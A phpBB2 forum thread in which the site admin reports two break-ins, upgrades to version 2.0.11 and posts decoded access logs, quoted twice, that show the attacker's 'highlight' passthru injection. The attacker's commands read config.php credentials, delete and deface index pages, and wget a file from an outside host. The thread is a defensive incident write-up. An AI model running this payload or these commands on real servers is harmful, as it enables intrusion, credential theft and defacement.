After two hacks during the past few days, I just updated this forum to phpBB2 version 2.0.11.
The previous version contained a vulnerability that could be exploited such that access to the Ca3DE website and forums was obtained. We suffered two such hacks during the past few days. Integrity of the website and forum is restored now, the integrity of the database was never violated.
Background information on the issue is available here:
http://www.phpbb.com/phpBB/viewforum.php?f=14
There are more security issues with PHP (not phpBB2!) that are mostly beyond my control, but I still hope that the measures taken will stop attacks like those of today and yesterday.
All log files are kept and securely stored for law enforcement.
At the opportunity, I also added a new set of smilies by Frederic Boogaertsl. These smilies are also used at the http://www.phpBB2.de website, and I think they are much nicer than the old ones.
Board update to phpBB2 version 2.0.11
Last edited by Carsten on 2005-01-02, 16:00, edited 2 times in total.
Best regards,
Carsten
Carsten
I just finished some log file analysis: Using
cat access.log.51.5 access.log.51.7 | grep -i highlight | grep -i 212.238.220.203 | perl -wne 'use URI::Escape; print uri_unescape($_);'
at the Linux command line for filtering the relevant log files yielded:
212.238.220.203 - - [17/Dec/2004:22:27:58 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; ls; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 15497 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [17/Dec/2004:22:28:30 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; uname -a; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 14927 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [17/Dec/2004:22:28:41 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; rm index.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 13761 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [17/Dec/2004:22:28:42 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; rm index.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 13950 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [17/Dec/2004:22:29:13 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; wget members.lycos.co.uk/icityiv/index.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 13417 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:01:48 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; w; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153848 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:01:53 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 157161 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:02:09 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cat config.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 164862 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:03:44 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; id; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 154910 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:03:51 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; pwd; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 155296 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:24 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ ; ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219696 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:39 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../;ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219298 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:45 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ &&ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219626 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:53 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ./ &&ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 218606 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:59 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ./ && ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 218306 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:14 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 218599 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:22 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; pwd; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 155290 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:28 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; ls -l; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 214064 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:41 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153927 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:44 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 157344 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:12 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a && l; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 157162 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:16 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a && ls; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 166863 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:21 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a && cat config.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 168479 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:37 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ && cat config.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153798 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:45 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ && ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219226 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:55 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ && ls; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 164029 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:07:36 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; echo haqed by LENIN666 > ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153405 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:09:04 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; echo <font color=red size=40>haqed by lenin_666</font> > ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 152581 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:09:44 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; echo <font color="red" size="40">haqed by lenin_666</font>" > ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153566 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:10:24 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; echo '<font color="red" size="40">haqed by lenin_666</font>' > ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153490 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:10:51 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cat ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 154380 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:11:23 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; id; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 155307 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:11:56 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; w; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153651 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:12:00 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; pwd; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 155310 http://www.ca3d-engine.de "-" "-" "-"
I think this is clear enough. (This is the first time that I ever experienced such, apart from arranged tests. Quite an interesting and instructive matter, though.)
phpBB2 2.0.11 fixes the issue.
IP 212.238.220.203 is permanently banned.
cat access.log.51.5 access.log.51.7 | grep -i highlight | grep -i 212.238.220.203 | perl -wne 'use URI::Escape; print uri_unescape($_);'
at the Linux command line for filtering the relevant log files yielded:
212.238.220.203 - - [17/Dec/2004:22:27:58 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; ls; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 15497 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [17/Dec/2004:22:28:30 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; uname -a; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 14927 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [17/Dec/2004:22:28:41 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; rm index.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 13761 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [17/Dec/2004:22:28:42 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; rm index.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 13950 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [17/Dec/2004:22:29:13 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; wget members.lycos.co.uk/icityiv/index.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 13417 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:01:48 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; w; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153848 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:01:53 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 157161 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:02:09 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cat config.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 164862 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:03:44 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; id; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 154910 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:03:51 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; pwd; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 155296 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:24 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ ; ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219696 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:39 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../;ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219298 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:45 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ &&ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219626 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:53 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ./ &&ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 218606 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:59 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ./ && ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 218306 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:14 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 218599 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:22 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; pwd; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 155290 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:28 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; ls -l; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 214064 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:41 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153927 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:44 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 157344 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:12 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a && l; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 157162 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:16 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a && ls; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 166863 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:21 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a && cat config.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 168479 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:37 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ && cat config.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153798 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:45 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ && ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219226 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:55 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ && ls; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 164029 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:07:36 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; echo haqed by LENIN666 > ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153405 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:09:04 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; echo <font color=red size=40>haqed by lenin_666</font> > ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 152581 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:09:44 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; echo <font color="red" size="40">haqed by lenin_666</font>" > ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153566 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:10:24 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; echo '<font color="red" size="40">haqed by lenin_666</font>' > ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153490 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:10:51 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cat ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 154380 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:11:23 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; id; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 155307 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:11:56 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; w; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153651 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:12:00 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; pwd; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 155310 http://www.ca3d-engine.de "-" "-" "-"
I think this is clear enough. (This is the first time that I ever experienced such, apart from arranged tests. Quite an interesting and instructive matter, though.)
phpBB2 2.0.11 fixes the issue.
IP 212.238.220.203 is permanently banned.
Best regards,
Carsten
Carsten
Well, it seems that theShadow wrote:nice work man. just out of curiosity how did he get in?
highlight=%27.passthru($HTTP_GET_VARS[rush]).%27
statements in the lines above enabled anyone to execute shell commands on the webserver. I'm not that much of a hacker that I know all the related details, but they are publicly documented on some websites. The commands that were run in each such call are stated in the rush variables above, e.g. the deletion and replacement of index.php in the first attack.
As also the config.php was spied out, I also changed the database password yesterday.
Best regards,
Carsten
Carsten
Who is online
Users browsing this forum: No registered users and 4 guests